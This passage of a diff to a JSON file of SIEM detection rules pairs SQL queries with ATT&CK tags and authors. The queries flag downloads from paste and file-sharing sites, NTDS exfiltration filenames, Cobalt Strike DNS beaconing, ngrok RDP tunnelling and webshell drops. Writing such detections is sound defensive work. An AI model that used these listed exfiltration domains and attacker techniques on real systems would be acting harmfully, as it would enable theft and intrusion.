'%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. 
You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE 
'%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + 
"id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_rename_win_ransomware.yml" + "filename": 
"win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Rename Common File to DLL File", - "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", - "author": "frack113", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Application installation" + "Antivirus products" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE 
'%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND 
ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_rename_win_not_dll_to_dll.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", - "author": "Florian Roth (Nextron Systems)", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "status": "experimental", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "SCR File Write Event", - "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"status": "experimental", - "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "The installation of new screen savers by third party software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_new_src_file.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "OpenSSH Server Listening On Socket", + "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "author": "mdecrevoisier", "tags": [ - "attack.persistence", - "attack.t1137" + "attack.lateral_movement", + "attack.t1021.004" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - 
"Synchronization of templates" + "Legitimate administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_sshd_openssh_server_listening_on_socket.yml" }, { - "title": "Advanced IP Scanner - File Event", - "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "title": "WMI Persistence", + "id": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "status": "test", - "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", - "author": "@ROxPinTeddy", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Legitimate administrative use" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((EventID = '5861' AND (logs MATCH ('\"ActiveScriptEventConsumer\" OR \"CommandLineEventConsumer\" OR \"CommandLineTemplate\"'))) OR EventID = '5859') AND NOT (Provider = 'SCM Event Provider' AND Query LIKE 'select % from MSFT\\_SCMEventLogEvent' ESCAPE '\\' AND User = 'S-1-5-32-544' AND PossibleCause = 'Permanent'))" ], - "filename": "file_event_win_advanced_ip_scanner.yml" + "filename": "win_wmi_persistence.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" 
+ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Detects programs on a Windows system that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "status": "test", - "description": 
"Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1071.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", - "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image 
LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Creation of an Executable by an Executable", - "id": "297afac9-5d02-4138-8c58-b977bac60556", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detects the creation of an executable by another executable", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Software installers", - "Update utilities", - "32bit applications launching their 64bit versions" + "Rare legitimate access to anonfiles.com" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%.exe' ESCAPE '\\' AND TargetFilename LIKE '%.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\cleanmgr.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\dxgiadaptercache.exe' ESCAPE '\\' OR Image LIKE 
'C:\\\\WINDOWS\\\\system32\\\\Dism.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%:\\\\WUDownloadCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WindowsUpdateBox.exe%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.Exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\Microsoft\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Squirrel.exe' ESCAPE 